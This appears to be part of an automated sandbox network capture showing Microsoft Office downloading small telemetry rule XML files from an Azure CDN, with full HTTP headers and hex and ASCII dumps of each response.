                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          40192.168.2.54975013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:39 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:39 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 420
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                          x-ms-request-id: df8835e2-601e-0002-5b4e-3ca786000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164439Z-15b8b599d882zv28hC1TEBdchn000000032g00000000at7p
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:39 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          41192.168.2.54975213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:39 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:39 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                          x-ms-request-id: 79192ebf-401e-0035-7e68-3b82d8000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164439Z-178bfbc474b9fdhphC1NYCac0n00000004mg00000000e6x3
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:39 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          42192.168.2.54975113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:39 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:39 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                          x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164439Z-178bfbc474bq2pr7hC1NYCkfgg00000004y0000000004bgd
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:39 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          43192.168.2.54975313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:39 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:40 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:39 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                          ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                          x-ms-request-id: d6db62af-701e-0097-3243-3db8c1000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164439Z-15b8b599d88tmlzshC1TEB4xpn0000000350000000004z9d
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:40 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          44192.168.2.54975413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:39 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:40 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:40 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 423
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                          x-ms-request-id: d83ea369-501e-000a-040c-3d0180000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164440Z-178bfbc474bfw4gbhC1NYCunf400000004ng00000000kp7b
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:40 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          45192.168.2.54975513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:42 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:42 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 478
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9B233827"
                                                                                                                                                                                          x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164442Z-178bfbc474bh5zbqhC1NYCkdug00000004p0000000009wu8
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:42 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          46192.168.2.54975613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:42 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:42 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 404
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                          ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                          x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164442Z-178bfbc474bgvl54hC1NYCsfuw00000004mg00000000m85b
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:42 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          47192.168.2.54975913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:42 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:42 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 400
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                          x-ms-request-id: ed66cbfc-201e-0051-7e30-3c7340000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164442Z-15b8b599d88pxmdghC1TEBux9c00000003d00000000030n0
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:42 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          48192.168.2.54975713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:42 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:42 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB046B576"
                                                                                                                                                                                          x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164442Z-178bfbc474bmqmgjhC1NYCy16c00000004xg0000000003qu
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:42 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          49192.168.2.54975813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:42 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:42 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 479
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                          x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164442Z-174c587ffdfn4nhwhC1TEB2nbc00000003ag000000005h7e
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
